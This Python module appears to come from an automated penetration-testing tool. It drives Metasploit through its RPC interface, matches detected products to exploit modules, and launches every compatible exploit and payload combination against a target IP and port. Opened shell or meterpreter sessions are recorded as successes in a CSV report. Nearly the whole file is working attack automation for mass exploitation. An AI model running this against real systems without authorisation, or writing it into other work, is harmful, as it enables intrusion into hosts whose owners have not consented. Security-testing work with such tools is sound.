#!/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import csv
import json
import time
import re
import codecs
import configparser
import msgpack
import http.client
import pandas as pd
sys.path.append('../')
from util import Utilty

# Type of printing.
OK = 'ok'         # [*]
NOTE = 'note'     # [+]
FAIL = 'fail'     # [-]
WARNING = 'warn'  # [!]
NONE = 'none'     # No label.


# Interface of Metasploit.
class Msgrpc:
    def __init__(self, option=[]):
        self.utility = Utilty()
        self.host = option.get('host') or "127.0.0.1"
        self.port = option.get('port') or 55552
        self.uri = option.get('uri') or "/api/"
        self.ssl = option.get('ssl') or False
        self.authenticated = False
        self.token = False
        self.headers = {"Content-type": "binary/message-pack"}
        if self.ssl:
            self.client = http.client.HTTPSConnection(self.host, self.port)
        else:
            self.client = http.client.HTTPConnection(self.host, self.port)

    # Call RPC API.
    def call(self, meth, option):
        if meth != "auth.login":
            if not self.authenticated:
                self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
                exit(1)

        if meth != "auth.login":
            option.insert(0, self.token)

        option.insert(0, meth)
        params = msgpack.packb(option)
        self.client.request("POST", self.uri, params, self.headers)
        resp = self.client.getresponse()
        return msgpack.unpackb(resp.read())

    # Log in to RPC Server.
    def login(self, user, password):
        ret = self.call('auth.login', [user, password])
        if ret.get(b'result') == b'success':
            self.authenticated = True
            self.token = ret.get(b'token')
            return True
        else:
            self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
            exit(1)

    # Send Metasploit command.
    def send_command(self, console_id, command, visualization, sleep=0.1):
        _ = self.call('console.write', [console_id, command])
        time.sleep(sleep)
        ret = self.call('console.read', [console_id])
        if visualization:
            try:
                self.utility.print_message(NONE, '{}'.format(ret.get(b'data').decode('utf-8')))
            except Exception as e:
                self.utility.print_exception(e, 'Send_command is exception.')
        return ret

    # Get all modules.
    def get_module_list(self, module_type):
        ret = {}
        if module_type == 'exploit':
            ret = self.call('module.exploits', [])
        elif module_type == 'auxiliary':
            ret = self.call('module.auxiliary', [])
        elif module_type == 'post':
            ret = self.call('module.post', [])
        elif module_type == 'payload':
            ret = self.call('module.payloads', [])
        elif module_type == 'encoder':
            ret = self.call('module.encoders', [])
        elif module_type == 'nop':
            ret = self.call('module.nops', [])
        byte_list = ret[b'modules']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get module detail information.
    def get_module_info(self, module_type, module_name):
        return self.call('module.info', [module_type, module_name])

    # Get payload that compatible module.
    def get_compatible_payload_list(self, module_name):
        ret = self.call('module.compatible_payloads', [module_name])
        byte_list = ret[b'payloads']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get payload that compatible target.
    def get_target_compatible_payload_list(self, module_name, target_num):
        ret = self.call('module.target_compatible_payloads', [module_name, target_num])
        byte_list = ret[b'payloads']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get module options.
    def get_module_options(self, module_type, module_name):
        return self.call('module.options', [module_type, module_name])

    # Execute module.
    def execute_module(self, module_type, module_name, options):
        ret = self.call('module.execute', [module_type, module_name, options])
        job_id = ret[b'job_id']
        uuid = ret[b'uuid'].decode('utf-8')
        return job_id, uuid

    # Get job list.
    def get_job_list(self):
        jobs = self.call('job.list', [])
        byte_list = jobs.keys()
        job_list = []
        for job_id in byte_list:
            job_list.append(int(job_id.decode('utf-8')))
        return job_list

    # Get job detail information.
    def get_job_info(self, job_id):
        return self.call('job.info', [job_id])

    # Stop job.
    def stop_job(self, job_id):
        return self.call('job.stop', [job_id])

    # Get session list.
    def get_session_list(self):
        return self.call('session.list', [])

    # Stop shell session.
    def stop_session(self, session_id):
        _ = self.call('session.stop', [str(session_id)])

    # Stop meterpreter session.
    def stop_meterpreter_session_kill(self, session_id):
        _ = self.call('session.meterpreter_session_kill', [str(session_id)])

    # Log out from RPC Server.
    def logout(self):
        ret = self.call('auth.logout', [self.token])
        if ret.get(b'result') == b'success':
            self.authenticated = False
            self.token = ''
            return True
        else:
            self.utility.print_message(FAIL, 'MsfRPC: Not Authenticated')
            exit(1)

    # Disconnection.
    def termination(self, console_id):
        # Kill a console.
        _ = self.call('console.session_kill', [console_id])
        # Log out
        _ = self.logout()


# Metasploit's environment.
class Exploit:
    def __init__(self, utility):
        # Read config file.
        self.utility = utility
        self.file_name = os.path.basename(__file__)
        self.full_path = os.path.dirname(os.path.abspath(__file__))
        self.root_path = os.path.join(self.full_path, '../')
        config = configparser.ConfigParser()
        try:
            config.read(os.path.join(self.root_path, 'config.ini'))
        except Exception as e:
            self.utility.print_message(FAIL, 'Reading config.ini is failure : {}'.format(e))
            self.utility.write_log(40, 'Reading config.ini is failure : {}'.format(e))
            sys.exit(1)

        server_host = config['Exploit']['server_host']
        server_port = config['Exploit']['server_port']
        msgrpc_user = config['Exploit']['msgrpc_user']
        msgrpc_password = config['Exploit']['msgrpc_pass']
        self.data_path = os.path.join(self.full_path, config['Exploit']['data_path'])
        self.converion_table_path = os.path.join(self.data_path, config['Exploit']['conversion_table'])
        self.timeout = int(config['Exploit']['timeout'])
        self.report_path = os.path.join(self.full_path, config['Report']['report_path'])
        self.report_temp = config['Report']['report_temp']
        self.action_name = 'Exploit'

        # Create Metasploit's instance.
        self.client = Msgrpc({'host': server_host, 'port': server_port})
        self.client.login(msgrpc_user, msgrpc_password)
        self.console_id = self.get_console()

    # Parse.
    def cutting_strings(self, pattern, target):
        return re.findall(pattern, target)

    # Convert product name nvd style to metasploit style.
    def convert_product_name(self, product_list):
        # Get Conversion table.
        df_origin = pd.read_csv(self.converion_table_path, encoding='utf-8').fillna('')
        target_list = []
        df_selected_product = None
        for product in product_list:
            if product[0] != '*' and product[1] != '*':
                df_selected_product = df_origin[(df_origin['nvd_vendor'] == product[0]) &
                                                (df_origin['nvd_name'] == product[1])]
            elif product[0] == '*' and product[1] != '*':
                df_selected_product = df_origin[(df_origin['nvd_name'] == product[1])]
            else:
                self.utility.print_message(WARNING, 'Not exist product name: {}'.format(product))
                continue

            # Extract product name for metasploit.
            if df_selected_product is not None:
                for target in df_selected_product['metasploit']:
                    target_list.append(target)
        return target_list

    # Create MSFconsole.
    def get_console(self):
        # Create a console.
        ret = self.client.call('console.create', [])
        console_id = ret.get(b'id')
        ret = self.client.call('console.read', [console_id])
        return console_id

    # Get all Exploit module list.
    def get_all_exploit_list(self):
        self.utility.print_message(NOTE, 'Get exploit list.')
        self.utility.write_log(20, '[In] Get exploit list [{}].'.format(self.file_name))
        all_exploit_list = []
        if os.path.exists(os.path.join(self.data_path, 'exploit_list.csv')) is False:
            self.utility.print_message(OK, 'Loading exploit list from Metasploit.')

            # Get Exploit module list.
            all_exploit_list = []
            exploit_candidate_list = self.client.get_module_list('exploit')
            for exploit in exploit_candidate_list:
                module_info = self.client.get_module_info('exploit', exploit)
                if module_info[b'rank'].decode('utf-8') in {'excellent', 'great', 'good'}:
                    all_exploit_list.append(exploit)

            # Save Exploit module list to local file.
            self.utility.print_message(OK, 'Loaded exploit num: {}'.format(str(len(all_exploit_list))))
            with codecs.open(os.path.join(self.data_path, 'exploit_list.csv'), 'w', 'utf-8') as fout:
                for item in all_exploit_list:
                    fout.write(item + '\n')
            self.utility.print_message(OK, 'Saved exploit list.')
        else:
            # Get exploit module list from local file.
            local_file = os.path.join(self.data_path, 'exploit_list.csv')
            self.utility.print_message(OK, 'Loading exploit list from local file: {}'.format(local_file))
            with codecs.open(local_file, 'r', 'utf-8') as fin:
                for item in fin:
                    all_exploit_list.append(item.rstrip('\n'))
        self.utility.write_log(20, '[Out] Get exploit list [{}].'.format(self.file_name))
        return all_exploit_list

    # Create exploit tree.
    def get_exploit_tree(self, all_exploit_list):
        self.utility.write_log(20, '[In] Get exploit tree [{}].'.format(self.file_name))
        self.utility.print_message(NOTE, 'Get exploit tree.')
        exploit_tree = {}
        if os.path.exists(os.path.join(self.data_path, 'exploit_tree.json')) is False:
            for idx, exploit in enumerate(all_exploit_list):
                exploit = exploit.replace('\n', '').replace('\r', '')
                temp_target_tree = {'targets': []}
                temp_tree = {}
                # Set exploit module.
                use_cmd = 'use exploit/' + exploit + '\n'
                _ = self.client.send_command(self.console_id, use_cmd, False)

                # Get target.
                show_cmd = 'show targets\n'
                target_info = ''
                time_count = 0
                while True:
                    ret = self.client.send_command(self.console_id, show_cmd, False)
                    target_info = ret.get(b'data').decode('utf-8')
                    if 'Exploit targets' in target_info:
                        break
                    if time_count == 5:
                        self.utility.print_message(WARNING, 'Timeout: {}'.format(show_cmd))
                        self.utility.print_message(WARNING, 'No exist Targets.')
                        break
                    time.sleep(1.0)
                    time_count += 1
                target_list = self.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info)
                for target in target_list:
                    # Get payload list.
                    payload_list = self.client.get_target_compatible_payload_list(exploit, int(target))
                    temp_tree[target] = payload_list

                # Get options.
                options = self.client.get_module_options('exploit', exploit)
                key_list = options.keys()
                option = {}
                for key in key_list:
                    sub_option = {}
                    sub_key_list = options[key].keys()
                    for sub_key in sub_key_list:
                        if isinstance(options[key][sub_key], list):
                            end_option = []
                            for end_key in options[key][sub_key]:
                                end_option.append(end_key.decode('utf-8'))
                            sub_option[sub_key.decode('utf-8')] = end_option
                        else:
                            end_option = {}
                            if isinstance(options[key][sub_key], bytes):
                                sub_option[sub_key.decode('utf-8')] = options[key][sub_key].decode('utf-8')
                            else:
                                sub_option[sub_key.decode('utf-8')] = options[key][sub_key]

                    # User specify.
                    sub_option['user_specify'] = ''
                    option[key.decode('utf-8')] = sub_option

                # Add payloads and targets to exploit tree.
                temp_target_tree['target_list'] = target_list
                temp_target_tree['targets'] = temp_tree
                temp_target_tree['options'] = option
                exploit_tree[exploit] = temp_target_tree
                # Output processing status to console.
                msg = '{}/{} exploit:{}, targets:{}'.format(str(idx + 1),
                                                            len(all_exploit_list),
                                                            exploit,
                                                            len(target_list))
                self.utility.print_message(OK, msg)

            # Save exploit tree to local file.
            with codecs.open(os.path.join(self.data_path, 'exploit_tree.json'), 'w', 'utf-8') as fout:
                json.dump(exploit_tree, fout, indent=4)
            self.utility.print_message(OK, 'Saved exploit tree.')
        else:
            # Get exploit tree from local file.
            exploit_tree = {}
            local_file = os.path.join(self.data_path, 'exploit_tree.json')
            self.utility.print_message(OK, 'Loading exploit tree from local file: {}'.format(local_file))
            with codecs.open(local_file, 'r', 'utf-8') as fin:
                exploit_tree = json.load(fin)
        self.utility.write_log(20, '[Out] Get exploit tree [{}].'.format(self.file_name))
        return exploit_tree

    # Get exploit module list for product.
    def get_exploit_list(self, prod_name):
        self.utility.write_log(20, '[In] Get exploit list [{}].'.format(self.file_name))
        module_list = []
        search_cmd = 'search name:' + prod_name + ' type:exploit app:server\n'
        ret = self.client.send_command(self.console_id, search_cmd, False, 3.0)
        raw_module_info = ret.get(b'data').decode('utf-8')
        exploit_candidate_list = self.cutting_strings(r'(exploit/.*)', raw_module_info)
        for exploit in exploit_candidate_list:
            raw_exploit_info = exploit.split(' ')
            exploit_info = list(filter(lambda s: s != '', raw_exploit_info))
            if exploit_info[2] in {'excellent', 'great', 'good'}:
                module_list.append(exploit_info[0])
        self.utility.write_log(20, '[Out] Get exploit list [{}].'.format(self.file_name))
        return module_list

    # Get target list.
    def get_target_list(self):
        self.utility.write_log(20, '[In] Get target list [{}].'.format(self.file_name))
        ret = self.client.send_command(self.console_id, 'show targets\n', False, 3.0)
        target_info = ret.get(b'data').decode('utf-8')
        target_list = self.cutting_strings(r'\s+([0-9]{1,3}).*[a-z|A-Z|0-9].*[\r\n]', target_info)
        self.utility.write_log(20, '[Out] Get target list [{}].'.format(self.file_name))
        return target_list

    # Set Metasploit options.
    def set_options(self, target_ip, target_port, exploit, payload, exploit_tree):
        self.utility.write_log(20, '[In] Set option [{}].'.format(self.file_name))
        options = exploit_tree[exploit]['options']
        key_list = options.keys()
        option = {}
        for key in key_list:
            if options[key]['required'] is True:
                sub_key_list = options[key].keys()
                if 'default' in sub_key_list:
                    # If "user_specify" is not null, set "user_specify" value to the key.
                    if options[key]['user_specify'] == '':
                        option[key] = options[key]['default']
                    else:
                        option[key] = options[key]['user_specify']
                else:
                    option[key] = '0'
        option['RHOST'] = target_ip
        option['RPORT'] = target_port
        if payload != '':
            option['PAYLOAD'] = payload
        self.utility.write_log(20, '[Out] Set option [{}].'.format(self.file_name))
        return option

    # Run exploit.
    def exploit(self, target):
        msg = self.utility.make_log_msg(self.utility.log_in,
                                        self.utility.log_att,
                                        self.file_name,
                                        action=self.action_name,
                                        note='Execute exploit',
                                        dest=self.utility.target_host)
        self.utility.write_log(20, msg)

        # Get target info.
        target_fqdn = target.get('fqdn')
        target_ip = target.get('ip')
        target_port = target.get('port')
        product_list = target.get('prod_list')
        target_path = target.get('path')

        # Assemble log name.
        date = self.utility.get_current_date('%Y%m%d%H%M%S%f')[:-3]
        log_name = self.report_temp.replace('*', target_fqdn + '_' + str(target_port) + '_' + target_path + '_' + date)
        log_path_fqdn = os.path.join(os.path.join(self.root_path, 'logs'), target_fqdn + '_' + str(target_port))
        if os.path.exists(log_path_fqdn) is False:
            os.mkdir(log_path_fqdn)
        log_file = os.path.join(log_path_fqdn, log_name)

        # Convert product name nvd style to metasploit style.
        target_list = list(set(self.convert_product_name(product_list)))

        # Get all exploit list.
        all_exploit_list = self.get_all_exploit_list()
        exploit_tree = self.get_exploit_tree(all_exploit_list)

        # Get exploit modules link with product.
        for prod_name in target_list:
            module_list = self.get_exploit_list(prod_name)
            for exploit_module in module_list:
                # Set exploit module.
                _ = self.client.send_command(self.console_id, 'use ' + exploit_module + '\n', False, 1.0)

                # Get target list.
                target_list = self.get_target_list()

                # Send payload to target server while changing target.
                for target in target_list:
                    result = ''
                    # Get payload list link with target.
                    payload_list = self.client.get_target_compatible_payload_list(exploit_module, int(target))
                    for payload in payload_list:
                        # Set options.
                        option = self.set_options(target_ip, target_port, exploit_module[8:], payload, exploit_tree)

                        # Run exploit.
                        job_id, uuid = self.client.execute_module('exploit', exploit_module, option)

                        # Judgement.
                        if uuid is not None:
                            # Waiting for running is finish (maximum wait time is "self.timeout (sec)".
                            time_count = 0
                            while True:
                                # Get job list.
                                job_id_list = self.client.get_job_list()
                                if job_id in job_id_list:
                                    time.sleep(1)
                                else:
                                    break
                                if self.timeout == time_count:
                                    # Delete job.
                                    result = 'timeout'
                                    self.client.stop_job(str(job_id))
                                    break
                                time_count += 1
                            # Get session list.
                            sessions = self.client.get_session_list()
                            key_list = sessions.keys()
                            if len(key_list) != 0:
                                for key in key_list:
                                    # If session list include target exploit uuid,
                                    # it probably succeeded exploitation.
                                    exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8')
                                    if uuid == exploit_uuid:
                                        result = 'bingo!!'

                                        # Gather reporting items.
                                        session_type = sessions[key][b'type'].decode('utf-8')
                                        session_port = str(sessions[key][b'session_port'])
                                        session_exploit = sessions[key][b'via_exploit'].decode('utf-8')
                                        session_payload = sessions[key][b'via_payload'].decode('utf-8')
                                        module_info = self.client.get_module_info('exploit', session_exploit)
                                        vuln_name = module_info[b'name'].decode('utf-8')
                                        description = module_info[b'description'].decode('utf-8')
                                        ref_list = module_info[b'references']
                                        reference = ''
                                        for item in ref_list:
                                            reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode(
                                                'utf-8') + '@@'

                                        # Logging target information for reporting.
                                        with open(log_file, 'a') as fout:
                                            bingo = [target_ip,
                                                     session_port,
                                                     prod_name,
                                                     vuln_name,
                                                     session_type,
                                                     description,
                                                     session_exploit,
                                                     target,
                                                     session_payload,
                                                     reference]
                                            writer = csv.writer(fout)
                                            writer.writerow(bingo)

                                        # Disconnect all session for next exploit.
                                        self.client.stop_session(key)
                                        self.client.stop_meterpreter_session_kill(key)
                                        break
                                    else:
                                        # If session list doesn't target exploit uuid,
                                        # it failed exploitation.
                                        result = 'failure'
                            else:
                                # If session list is empty, it failed exploitation.
                                result = 'failure'
                        else:
                            # Time out.
                            result = 'timeout'

                        # Output result to console.
                        string_color = ''
                        msg = '{}, target: {}, payload: {}, result: {}'.format(exploit_module, target, payload, result)
                        if result == 'bingo!!':
                            self.utility.print_message(OK, msg)
                        else:
                            self.utility.print_message(WARNING, msg)
                        msg = self.utility.make_log_msg(self.utility.log_mid,
                                                        self.utility.log_att,
                                                        self.file_name,
                                                        action=self.action_name,
                                                        note=msg,
                                                        dest=self.utility.target_host)
                        self.utility.write_log(20, msg)

        # Terminate
        self.client.termination(self.console_id)
        msg = self.utility.make_log_msg(self.utility.log_out,
                                        self.utility.log_att,
                                        self.file_name,
                                        action=self.action_name,
                                        note='Execute exploit',
                                        dest=self.utility.target_host)
        self.utility.write_log(20, msg)
